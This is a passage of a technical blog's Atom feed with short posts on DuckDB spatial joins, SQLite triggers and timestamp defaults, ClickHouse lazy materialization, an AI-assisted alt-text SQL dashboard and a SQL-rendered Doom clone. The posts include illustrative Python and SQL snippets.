&lt;span class="pl-k"&gt;FROM&lt;/span&gt; rides
&lt;span class="pl-k"&gt;JOIN&lt;/span&gt; hoods &lt;span class="pl-k"&gt;ON&lt;/span&gt; ST_Intersects(
  &lt;span class="pl-c1"&gt;rides&lt;/span&gt;.&lt;span class="pl-c1"&gt;start_geom&lt;/span&gt;, &lt;span class="pl-c1"&gt;hoods&lt;/span&gt;.&lt;span class="pl-c1"&gt;geom&lt;/span&gt;
)
&lt;span class="pl-k"&gt;GROUP BY&lt;/span&gt; neighborhood
&lt;span class="pl-k"&gt;ORDER BY&lt;/span&gt; num_rides &lt;span class="pl-k"&gt;DESC&lt;/span&gt;
&lt;span class="pl-k"&gt;LIMIT&lt;/span&gt; &lt;span class="pl-c1"&gt;3&lt;/span&gt;;&lt;/pre&gt;

&lt;p&gt;The rides table contains 58,033,724 rows. The hoods table has polygons for 310 neighborhoods.&lt;/p&gt;
&lt;p&gt;Without an optimized spatial join this query requires a nested loop join, executing that expensive &lt;code&gt;ST_Intersects()&lt;/code&gt; operation 58m * 310 ~= 18 billion times. This took around 30 minutes on the 36GB MacBook M3 Pro used for the benchmark.&lt;/p&gt;
&lt;p&gt;The first optimization described - implemented from DuckDB 1.2.0 onwards - uses a "piecewise merge join". This takes advantage of the fact that a bounding box intersection is a whole lot faster to calculate, especially if you pre-cache the bounding box (aka the minimum bounding rectangle or MBR) in the stored binary &lt;code&gt;GEOMETRY&lt;/code&gt; representation.&lt;/p&gt;
&lt;p&gt;Rewriting the query to use a fast bounding box intersection and then only running the more expensive &lt;code&gt;ST_Intersects()&lt;/code&gt; filters on those matches drops the runtime from 1800 seconds to 107 seconds.&lt;/p&gt;
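&lt;p&gt;To make that filter-then-refine pattern concrete, here is a minimal Python sketch. It is not DuckDB's implementation: the &lt;code&gt;Box&lt;/code&gt; type, the function names and the toy data are all invented for illustration, and it uses point-in-polygon ray casting as a stand-in for the expensive &lt;code&gt;ST_Intersects()&lt;/code&gt; call.&lt;/p&gt;

```python
from typing import NamedTuple


class Box(NamedTuple):
    """Minimum bounding rectangle (MBR) of a polygon."""
    min_x: float
    min_y: float
    max_x: float
    max_y: float


def bounding_box(polygon):
    """Compute the MBR of a polygon given as a list of (x, y) vertices."""
    xs = [x for x, _ in polygon]
    ys = [y for _, y in polygon]
    return Box(min(xs), min(ys), max(xs), max(ys))


def box_contains(box, point):
    """Cheap check: four comparisons, no geometry."""
    x, y = point
    return x >= box.min_x and box.max_x >= x and y >= box.min_y and box.max_y >= y


def polygon_contains(polygon, point):
    """Exact check using ray casting (the expensive step in this sketch)."""
    x, y = point
    inside = False
    j = len(polygon) - 1
    for i in range(len(polygon)):
        xi, yi = polygon[i]
        xj, yj = polygon[j]
        # Only edges that straddle the horizontal line through the point matter.
        if (yi > y) != (yj > y):
            x_cross = xi + (y - yi) * (xj - xi) / (yj - yi)
            if x_cross > x:
                inside = not inside
        j = i
    return inside


def count_points_per_polygon(polygons, points):
    """Count points per polygon, running the exact test only on box matches."""
    boxes = {name: bounding_box(poly) for name, poly in polygons.items()}
    counts = {name: 0 for name in polygons}
    exact_checks = 0
    for point in points:
        for name, poly in polygons.items():
            if not box_contains(boxes[name], point):
                continue  # rejected by the cheap bounding box test
            exact_checks += 1
            if polygon_contains(poly, point):
                counts[name] += 1
    return counts, exact_checks


if __name__ == "__main__":
    hoods = {
        "square": [(0, 0), (2, 0), (2, 2), (0, 2)],
        "triangle": [(10, 10), (14, 10), (10, 14)],
    }
    ride_starts = [(1, 1), (11, 11), (13, 13), (50, 50)]
    counts, exact_checks = count_points_per_polygon(hoods, ride_starts)
    print(counts, "exact checks:", exact_checks)
```

&lt;p&gt;With this toy data only three of the eight point/polygon pairs reach the exact test. The point at (13, 13) shows why the second stage is still needed: it falls inside the triangle's bounding box but outside the triangle itself.&lt;/p&gt;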
&lt;p&gt;The second optimization, added in &lt;a href="https://duckdb.org/2025/05/21/announcing-duckdb-130.html"&gt;DuckDB 1.3.0&lt;/a&gt; in May 2025 using the new SPATIAL_JOIN operator, is significantly more sophisticated.&lt;/p&gt;
&lt;p&gt;DuckDB can now identify when a spatial join is working against large volumes of data and automatically build an in-memory R-Tree of bounding boxes for the larger of the two tables being joined.&lt;/p&gt;
&lt;p&gt;This new R-Tree further accelerates the bounding box intersection part of the join, and drops the runtime down to just 30 seconds.

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://bsky.app/profile/mackaszechno.bsky.social/post/3lx3lnagg7s2t"&gt;@mackaszechno.bsky.social&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/geospatial"&gt;geospatial&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/duckdb"&gt;duckdb&lt;/a&gt;&lt;/p&gt;



</summary><category term="geospatial"/><category term="sql"/><category term="duckdb"/></entry><entry><title>TIL: SQLite triggers</title><link href="https://simonwillison.net/2025/May/10/til-sqlite-triggers/#atom-tag" rel="alternate"/><published>2025-05-10T05:20:45+00:00</published><updated>2025-05-10T05:20:45+00:00</updated><id>https://simonwillison.net/2025/May/10/til-sqlite-triggers/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://til.simonwillison.net/sqlite/sqlite-triggers"&gt;TIL: SQLite triggers&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
I've been doing some work with SQLite triggers recently while working on &lt;a href="https://github.com/simonw/sqlite-chronicle"&gt;sqlite-chronicle&lt;/a&gt;, and I decided I needed a single reference to exactly which triggers are executed for which SQLite actions and what data is available within those triggers.&lt;/p&gt;
&lt;p&gt;I wrote this &lt;a href="https://github.com/simonw/til/blob/main/sqlite/triggers.py"&gt;triggers.py&lt;/a&gt; script to output as much information about triggers as possible, then wired it into a TIL article using &lt;a href="https://cog.readthedocs.io/"&gt;Cog&lt;/a&gt;. The Cog-powered source code for the TIL article &lt;a href="https://github.com/simonw/til/blob/main/sqlite/sqlite-triggers.md?plain=1"&gt;can be seen here&lt;/a&gt;.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/til"&gt;til&lt;/a&gt;&lt;/p&gt;



</summary><category term="python"/><category term="sql"/><category term="sqlite"/><category term="til"/></entry><entry><title>SQLite CREATE TABLE: The DEFAULT clause</title><link href="https://simonwillison.net/2025/May/8/sqlite-create-table-default-timestamp/#atom-tag" rel="alternate"/><published>2025-05-08T22:37:44+00:00</published><updated>2025-05-08T22:37:44+00:00</updated><id>https://simonwillison.net/2025/May/8/sqlite-create-table-default-timestamp/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.sqlite.org/lang_createtable.html#the_default_clause"&gt;SQLite CREATE TABLE: The DEFAULT clause&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
If your SQLite create table statement includes a line like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE alerts (
    -- ...
    alert_created_at text default current_timestamp
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;current_timestamp&lt;/code&gt; will be replaced with a UTC timestamp in the format &lt;code&gt;2025-05-08 22:19:33&lt;/code&gt;. You can also use &lt;code&gt;current_time&lt;/code&gt; for &lt;code&gt;HH:MM:SS&lt;/code&gt; and &lt;code&gt;current_date&lt;/code&gt; for &lt;code&gt;YYYY-MM-DD&lt;/code&gt;, again using UTC.&lt;/p&gt;
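&lt;p&gt;Here's a quick way to check that behavior from Python using the standard library &lt;code&gt;sqlite3&lt;/code&gt; module. This is a sketch: the &lt;code&gt;id&lt;/code&gt; and &lt;code&gt;message&lt;/code&gt; columns and the inserted row are made up for the example, and only the &lt;code&gt;alert_created_at&lt;/code&gt; column comes from the snippet above.&lt;/p&gt;

```python
import sqlite3
from datetime import datetime, timezone

conn = sqlite3.connect(":memory:")
conn.execute(
    """
    CREATE TABLE alerts (
        id integer primary key,          -- hypothetical column
        message text,                    -- hypothetical column
        alert_created_at text default current_timestamp
    )
    """
)

# No value is supplied for alert_created_at, so SQLite fills in the default.
conn.execute("INSERT INTO alerts (message) VALUES ('disk almost full')")
(created_at,) = conn.execute("SELECT alert_created_at FROM alerts").fetchone()

# Parse the stored string and compare it with the current time in UTC.
parsed = datetime.strptime(created_at, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
drift = abs((datetime.now(timezone.utc) - parsed).total_seconds())
print(created_at, "is", round(drift), "seconds away from the current UTC time")
```

&lt;p&gt;If the default used local time instead, the reported difference would equal your UTC offset on any machine not set to UTC.&lt;/p&gt;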
&lt;p&gt;Posting this here because I hadn't previously noticed that this defaults to UTC, which is a useful detail. It's also a strong vote in favor of &lt;code&gt;YYYY-MM-DD HH:MM:SS&lt;/code&gt; as a string format for use with SQLite, which &lt;a href="https://www.sqlite.org/lang_datefunc.html"&gt;doesn't otherwise provide&lt;/a&gt; a formal datetime type.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/datetime"&gt;datetime&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;&lt;/p&gt;



</summary><category term="datetime"/><category term="sql"/><category term="sqlite"/></entry><entry><title>DuckDB is Probably the Most Important Geospatial Software of the Last Decade</title><link href="https://simonwillison.net/2025/May/4/duckdb-is-probably-the-most-important-geospatial-software-of-the/#atom-tag" rel="alternate"/><published>2025-05-04T00:28:35+00:00</published><updated>2025-05-04T00:28:35+00:00</updated><id>https://simonwillison.net/2025/May/4/duckdb-is-probably-the-most-important-geospatial-software-of-the/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.dbreunig.com/2025/05/03/duckdb-is-the-most-impactful-geospatial-software-in-a-decade.html"&gt;DuckDB is Probably the Most Important Geospatial Software of the Last Decade&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Drew Breunig argues that the ease of installation of DuckDB is opening up geospatial analysis to a whole new set of developers.&lt;/p&gt;
&lt;p&gt;This inspired &lt;a href="https://news.ycombinator.com/item?id=43881468#43882914"&gt;a comment on Hacker News&lt;/a&gt; from DuckDB Labs geospatial engineer Max Gabrielsson which helps explain why the drop in friction introduced by DuckDB is so significant:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I think a big part is that duckdbs spatial extension provides a SQL interface to a whole suite of standard foss gis packages by statically bundling everything (including inlining the default PROJ database of coordinate projection systems into the binary) and providing it for multiple platforms (including WASM). I.E there are no transitive dependencies except libc.&lt;/p&gt;
&lt;p&gt;[...] the fact that you can e.g. convert too and from a myriad of different geospatial formats by utilizing GDAL, transforming through SQL, or pulling down the latest overture dump without having the whole workflow break just cause you updated QGIS has probably been the main killer feature for a lot of the early adopters.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I've lost count of the time I've spent fiddling with dependencies like GDAL trying to get various geospatial tools to work in the past. Bundling difficult dependencies statically is an under-appreciated trick!&lt;/p&gt;
&lt;p&gt;If the bold claim in the headline inspires you to provide a counter-example, bear in mind that a decade ago is 2015, and most of the key technologies in the modern geospatial stack - QGIS, PostGIS, geopandas, SpatiaLite - predate that by quite a bit.&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/geospatial"&gt;geospatial&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/duckdb"&gt;duckdb&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/drew-breunig"&gt;drew-breunig&lt;/a&gt;&lt;/p&gt;



</summary><category term="geospatial"/><category term="sql"/><category term="duckdb"/><category term="drew-breunig"/></entry><entry><title>New dashboard: alt text for all my images</title><link href="https://simonwillison.net/2025/Apr/28/dashboard-alt-text/#atom-tag" rel="alternate"/><published>2025-04-28T01:22:27+00:00</published><updated>2025-04-28T01:22:27+00:00</updated><id>https://simonwillison.net/2025/Apr/28/dashboard-alt-text/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://simonwillison.net/dashboard/alt-text/"&gt;New dashboard: alt text for all my images&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
I got curious today about how I'd been using alt text for images on my blog, and realized that since I have &lt;a href="https://django-sql-dashboard.datasette.io/"&gt;Django SQL Dashboard&lt;/a&gt; running on this site and PostgreSQL is capable of &lt;a href="https://stackoverflow.com/questions/1732348/regex-match-open-tags-except-xhtml-self-contained-tags/1732454#1732454"&gt;parsing HTML with regular expressions&lt;/a&gt; I could probably find out using a SQL query.&lt;/p&gt;
&lt;p&gt;I pasted &lt;a href="https://simonwillison.net/dashboard/schema/"&gt;my PostgreSQL schema&lt;/a&gt; into Claude and gave it a pretty long prompt:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Give this PostgreSQL schema I want a query that returns all of my images and their alt text. Images are sometimes stored as HTML image tags and other times stored in markdown.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;blog_quotation.quotation&lt;/code&gt;, &lt;code&gt;blog_note.body&lt;/code&gt; both contain markdown. &lt;code&gt;blog_blogmark.commentary&lt;/code&gt; has markdown if &lt;code&gt;use_markdown&lt;/code&gt; is true or HTML otherwise. &lt;code&gt;blog_entry.body&lt;/code&gt; is always HTML&lt;/p&gt;
&lt;p&gt;Write me a SQL query to extract all of my images and their alt tags using regular expressions. In HTML documents it should look for either &lt;code&gt;&amp;lt;img .* src="..." .* alt="..."&lt;/code&gt; or &lt;code&gt;&amp;lt;img alt="..." .* src="..."&lt;/code&gt; (images may be self-closing XHTML style in some places). In Markdown they will always be &lt;code&gt;![alt text](url)&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I want the resulting table to have three columns: URL, alt_text, src - the URL column needs to be constructed as e.g. &lt;code&gt;/2025/Feb/2/slug&lt;/code&gt; for a record where created is on 2nd feb 2025 and the &lt;code&gt;slug&lt;/code&gt; column contains &lt;code&gt;slug&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Use CTEs and unions where appropriate&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;It almost got it right on the first go, and with &lt;a href="https://claude.ai/share/e3b996d3-b480-436d-aa40-9caa7609474f"&gt;a couple of follow-up prompts&lt;/a&gt; I had the query I wanted. I also added the option to &lt;a href="https://simonwillison.net/dashboard/alt-text/?search=pelican"&gt;search&lt;/a&gt; my alt text / image URLs, which has already helped me hunt down and fix a few old images on expired domain names. Here's a copy of &lt;a href="https://gist.github.com/simonw/5b44a662354e124e33cc1d4704cdb91a"&gt;the finished 100 line SQL query&lt;/a&gt;.
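&lt;p&gt;For a sense of what the Markdown half of that extraction involves, here's a rough Python sketch. It is not the PostgreSQL query linked above: the pattern, the &lt;code&gt;markdown_images()&lt;/code&gt; helper and the example URLs are my own illustration of matching &lt;code&gt;![alt text](url)&lt;/code&gt; with a regular expression.&lt;/p&gt;

```python
import re

# Matches ![alt text](url) and ![alt text](url "optional title").
# Group 1 is the alt text, group 2 is the image URL.
MARKDOWN_IMAGE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")


def markdown_images(markdown):
    """Return a list of {"alt_text": ..., "src": ...} dicts for a Markdown string."""
    return [
        {"alt_text": alt, "src": src}
        for alt, src in MARKDOWN_IMAGE.findall(markdown)
    ]


if __name__ == "__main__":
    body = (
        "Intro ![A pelican on a bicycle](https://example.com/pelican.jpg) "
        'and ![](https://example.com/untitled.png "A title")'
    )
    for image in markdown_images(body):
        print(image)
```

&lt;p&gt;An empty &lt;code&gt;alt_text&lt;/code&gt; value is the interesting case here, since those are the images that need attention.&lt;/p&gt;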


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/accessibility"&gt;accessibility&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/alt-text"&gt;alt-text&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/postgresql"&gt;postgresql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/django-sql-dashboard"&gt;django-sql-dashboard&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;&lt;/p&gt;



</summary><category term="accessibility"/><category term="alt-text"/><category term="postgresql"/><category term="sql"/><category term="ai"/><category term="django-sql-dashboard"/><category term="generative-ai"/><category term="llms"/><category term="ai-assisted-programming"/><category term="claude"/></entry><entry><title>ClickHouse gets lazier (and faster): Introducing lazy materialization</title><link href="https://simonwillison.net/2025/Apr/22/clickhouse-lazy-materializati/#atom-tag" rel="alternate"/><published>2025-04-22T17:05:33+00:00</published><updated>2025-04-22T17:05:33+00:00</updated><id>https://simonwillison.net/2025/Apr/22/clickhouse-lazy-materializati/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://clickhouse.com/blog/clickhouse-gets-lazier-and-faster-introducing-lazy-materialization"&gt;ClickHouse gets lazier (and faster): Introducing lazy materialization&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Tom Schreiber describes the latest optimization in ClickHouse, and in the process explores a whole bunch of interesting characteristics of columnar datastores generally.&lt;/p&gt;
&lt;p&gt;As I understand it, the new "lazy materialization" feature means that if you run a query like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select id, big_col1, big_col2
from big_table order by rand() limit 5
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Those &lt;code&gt;big_col1&lt;/code&gt; and &lt;code&gt;big_col2&lt;/code&gt; columns won't be read from disk for every record, just for the five that are returned. This can dramatically improve the performance of queries against huge tables - for one example query ClickHouse report a drop from "219 seconds to just 139 milliseconds—with 40× less data read and 300× lower memory usage."&lt;/p&gt;
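&lt;p&gt;Here's a toy Python model of that idea, based on my reading of the article rather than on how ClickHouse is actually implemented. The &lt;code&gt;Column&lt;/code&gt; class and both query functions are hypothetical; the point is just to count how many values get read from the wide column in each strategy.&lt;/p&gt;

```python
import random


class Column:
    """An in-memory stand-in for a column on disk that counts value reads."""

    def __init__(self, values):
        self.values = list(values)
        self.reads = 0

    def read(self, row_id):
        self.reads += 1
        return self.values[row_id]


def eager_random_rows(id_col, big_col, limit, rng):
    """Materialize every row up front, then sort randomly and truncate."""
    rows = [(id_col.read(i), big_col.read(i)) for i in range(len(id_col.values))]
    rows.sort(key=lambda _row: rng.random())
    return rows[:limit]


def lazy_random_rows(id_col, big_col, limit, rng):
    """Pick the surviving row ids first, then read the wide column for those only."""
    row_ids = sorted(range(len(id_col.values)), key=lambda _i: rng.random())[:limit]
    return [(id_col.read(i), big_col.read(i)) for i in row_ids]


if __name__ == "__main__":
    n = 100_000
    for query in (eager_random_rows, lazy_random_rows):
        id_col = Column(range(n))
        big_col = Column("x" * 100 for _ in range(n))
        rows = query(id_col, big_col, limit=5, rng=random.Random(0))
        print(query.__name__, "returned", len(rows), "rows after",
              big_col.reads, "reads of the big column")
```

&lt;p&gt;The eager version reads the wide column once per row in the table, while the lazy version reads it once per row returned.&lt;/p&gt;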
&lt;p&gt;I'm linking to this mainly because the article itself is such a detailed discussion of columnar data patterns in general. It caused me to update my intuition for how queries against large tables can work on modern hardware. This query for example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT helpful_votes
FROM amazon.amazon_reviews
ORDER BY helpful_votes DESC
LIMIT 3;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can run in 70ms against a 150 million row, 70GB table - because in a columnar database you only need to read that &lt;code&gt;helpful_votes&lt;/code&gt; integer column which adds up to just 600MB of data, and sorting 150 million integers on a decent machine takes no time at all.

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=43763688"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/databases"&gt;databases&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/clickhouse"&gt;clickhouse&lt;/a&gt;&lt;/p&gt;



</summary><category term="databases"/><category term="sql"/><category term="clickhouse"/></entry><entry><title>Abusing DuckDB-WASM by making SQL draw 3D graphics (Sort Of)</title><link href="https://simonwillison.net/2025/Apr/22/duckdb-wasm-doom/#atom-tag" rel="alternate"/><published>2025-04-22T16:29:13+00:00</published><updated>2025-04-22T16:29:13+00:00</updated><id>https://simonwillison.net/2025/Apr/22/duckdb-wasm-doom/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.hey.earth/posts/duckdb-doom"&gt;Abusing DuckDB-WASM by making SQL draw 3D graphics (Sort Of)&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Brilliant hack by Patrick Trainer who got an ASCII-art Doom clone running in the browser using convoluted SQL queries running against the WebAssembly build of DuckDB. Here’s the &lt;a href="https://patricktrainer.github.io/duckdb-doom/"&gt;live demo&lt;/a&gt;, and the &lt;a href="https://github.com/patricktrainer/duckdb-doom"&gt;code on GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;div style="text-align: center; margin-bottom: 1em"&gt;
&lt;img alt="Animated demo GIF. Green ASCII art on black, with a map on the right and a Doom-style first person view on the left." src="https://static.simonwillison.net/static/2025/duckdb-wasm-doom.gif"&gt;
&lt;/div&gt;

&lt;p&gt;The SQL is &lt;a href="https://github.com/patricktrainer/duckdb-doom/blob/c36bcdab16bea40d916d3165f7bfdb437b86dde2/index.html#L140-L224"&gt;so much fun&lt;/a&gt;. Here’s a snippet that implements ray tracing as part of a SQL view:&lt;/p&gt;
&lt;pre&gt;&lt;span class="pl-k"&gt;CREATE OR REPLACE&lt;/span&gt; &lt;span class="pl-k"&gt;VIEW&lt;/span&gt; &lt;span class="pl-en"&gt;render_3d_frame&lt;/span&gt; &lt;span class="pl-k"&gt;AS&lt;/span&gt;
WITH RECURSIVE
    &lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;--&lt;/span&gt; ...&lt;/span&gt;
    rays &lt;span class="pl-k"&gt;AS&lt;/span&gt; (
        &lt;span class="pl-k"&gt;SELECT&lt;/span&gt; 
            &lt;span class="pl-c1"&gt;c&lt;/span&gt;.&lt;span class="pl-c1"&gt;col&lt;/span&gt;, 
            (&lt;span class="pl-c1"&gt;p&lt;/span&gt;.&lt;span class="pl-c1"&gt;dir&lt;/span&gt; &lt;span class="pl-k"&gt;-&lt;/span&gt; &lt;span class="pl-c1"&gt;s&lt;/span&gt;.&lt;span class="pl-c1"&gt;fov&lt;/span&gt;&lt;span class="pl-k"&gt;/&lt;/span&gt;&lt;span class="pl-c1"&gt;2&lt;/span&gt;.&lt;span class="pl-c1"&gt;0&lt;/span&gt; &lt;span class="pl-k"&gt;+&lt;/span&gt; &lt;span class="pl-c1"&gt;s&lt;/span&gt;.&lt;span class="pl-c1"&gt;fov&lt;/span&gt; &lt;span class="pl-k"&gt;*&lt;/span&gt; (&lt;span class="pl-c1"&gt;c&lt;/span&gt;.&lt;span class="pl-c1"&gt;col&lt;/span&gt;&lt;span class="pl-k"&gt;*&lt;/span&gt;&lt;span class="pl-c1"&gt;1&lt;/span&gt;.&lt;span class="pl-c1"&gt;0&lt;/span&gt; &lt;span class="pl-k"&gt;/&lt;/span&gt; (&lt;span class="pl-c1"&gt;s&lt;/span&gt;.&lt;span class="pl-c1"&gt;view_w&lt;/span&gt; &lt;span class="pl-k"&gt;-&lt;/span&gt; &lt;span class="pl-c1"&gt;1&lt;/span&gt;))) &lt;span class="pl-k"&gt;AS&lt;/span&gt; angle 
        &lt;span class="pl-k"&gt;FROM&lt;/span&gt; cols c, s, p
    ),
    raytrace(col, step_count, fx, fy, angle) &lt;span class="pl-k"&gt;AS&lt;/span&gt; (
        &lt;span class="pl-k"&gt;SELECT&lt;/span&gt; 
            &lt;span class="pl-c1"&gt;r&lt;/span&gt;.&lt;span class="pl-c1"&gt;col&lt;/span&gt;, 
            &lt;span class="pl-c1"&gt;1&lt;/span&gt;, 
            &lt;span class="pl-c1"&gt;p&lt;/span&gt;.&lt;span class="pl-c1"&gt;x&lt;/span&gt; &lt;span class="pl-k"&gt;+&lt;/span&gt; COS(&lt;span class="pl-c1"&gt;r&lt;/span&gt;.&lt;span class="pl-c1"&gt;angle&lt;/span&gt;)&lt;span class="pl-k"&gt;*&lt;/span&gt;&lt;span class="pl-c1"&gt;s&lt;/span&gt;.&lt;span class="pl-c1"&gt;step&lt;/span&gt;, 
            &lt;span class="pl-c1"&gt;p&lt;/span&gt;.&lt;span class="pl-c1"&gt;y&lt;/span&gt; &lt;span class="pl-k"&gt;+&lt;/span&gt; SIN(&lt;span class="pl-c1"&gt;r&lt;/span&gt;.&lt;span class="pl-c1"&gt;angle&lt;/span&gt;)&lt;span class="pl-k"&gt;*&lt;/span&gt;&lt;span class="pl-c1"&gt;s&lt;/span&gt;.&lt;span class="pl-c1"&gt;step&lt;/span&gt;, 
            &lt;span class="pl-c1"&gt;r&lt;/span&gt;.&lt;span class="pl-c1"&gt;angle&lt;/span&gt; 
        &lt;span class="pl-k"&gt;FROM&lt;/span&gt; rays r, p, s 
        &lt;span class="pl-k"&gt;UNION ALL&lt;/span&gt; 
        &lt;span class="pl-k"&gt;SELECT&lt;/span&gt; 
            &lt;span class="pl-c1"&gt;rt&lt;/span&gt;.&lt;span class="pl-c1"&gt;col&lt;/span&gt;, 
            &lt;span class="pl-c1"&gt;rt&lt;/span&gt;.&lt;span class="pl-c1"&gt;step_count&lt;/span&gt; &lt;span class="pl-k"&gt;+&lt;/span&gt; &lt;span class="pl-c1"&gt;1&lt;/span&gt;, 
            &lt;span class="pl-c1"&gt;rt&lt;/span&gt;.&lt;span class="pl-c1"&gt;fx&lt;/span&gt; &lt;span class="pl-k"&gt;+&lt;/span&gt; COS(&lt;span class="pl-c1"&gt;rt&lt;/span&gt;.&lt;span class="pl-c1"&gt;angle&lt;/span&gt;)&lt;span class="pl-k"&gt;*&lt;/span&gt;&lt;span class="pl-c1"&gt;s&lt;/span&gt;.&lt;span class="pl-c1"&gt;step&lt;/span&gt;, 
            &lt;span class="pl-c1"&gt;rt&lt;/span&gt;.&lt;span class="pl-c1"&gt;fy&lt;/span&gt; &lt;span class="pl-k"&gt;+&lt;/span&gt; SIN(&lt;span class="pl-c1"&gt;rt&lt;/span&gt;.&lt;span class="pl-c1"&gt;angle&lt;/span&gt;)&lt;span class="pl-k"&gt;*&lt;/span&gt;&lt;span class="pl-c1"&gt;s&lt;/span&gt;.&lt;span class="pl-c1"&gt;step&lt;/span&gt;, 
            &lt;span class="pl-c1"&gt;rt&lt;/span&gt;.&lt;span class="pl-c1"&gt;angle&lt;/span&gt; 
        &lt;span class="pl-k"&gt;FROM&lt;/span&gt; raytrace rt, s 
        &lt;span class="pl-k"&gt;WHERE&lt;/span&gt; &lt;span class="pl-c1"&gt;rt&lt;/span&gt;.&lt;span class="pl-c1"&gt;step_count&lt;/span&gt; &lt;span class="pl-k"&gt;&amp;lt;&lt;/span&gt; &lt;span class="pl-c1"&gt;s&lt;/span&gt;.&lt;span class="pl-c1"&gt;max_steps&lt;/span&gt; 
          &lt;span class="pl-k"&gt;AND&lt;/span&gt; NOT EXISTS (
              &lt;span class="pl-k"&gt;SELECT&lt;/span&gt; &lt;span class="pl-c1"&gt;1&lt;/span&gt; 
              &lt;span class="pl-k"&gt;FROM&lt;/span&gt; map m 
              &lt;span class="pl-k"&gt;WHERE&lt;/span&gt; &lt;span class="pl-c1"&gt;m&lt;/span&gt;.&lt;span class="pl-c1"&gt;x&lt;/span&gt; &lt;span class="pl-k"&gt;=&lt;/span&gt; CAST(&lt;span class="pl-c1"&gt;rt&lt;/span&gt;.&lt;span class="pl-c1"&gt;fx&lt;/span&gt; &lt;span class="pl-k"&gt;AS&lt;/span&gt; &lt;span class="pl-k"&gt;INT&lt;/span&gt;) 
                &lt;span class="pl-k"&gt;AND&lt;/span&gt; &lt;span class="pl-c1"&gt;m&lt;/span&gt;.&lt;span class="pl-c1"&gt;y&lt;/span&gt; &lt;span class="pl-k"&gt;=&lt;/span&gt; CAST(&lt;span class="pl-c1"&gt;rt&lt;/span&gt;.&lt;span class="pl-c1"&gt;fy&lt;/span&gt; &lt;span class="pl-k"&gt;AS&lt;/span&gt; &lt;span class="pl-k"&gt;INT&lt;/span&gt;) 
                &lt;span class="pl-k"&gt;AND&lt;/span&gt; &lt;span class="pl-c1"&gt;m&lt;/span&gt;.&lt;span class="pl-c1"&gt;tile&lt;/span&gt; &lt;span class="pl-k"&gt;=&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;#&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;
          )
    ),
    &lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;--&lt;/span&gt; ...&lt;/span&gt;&lt;/pre&gt;

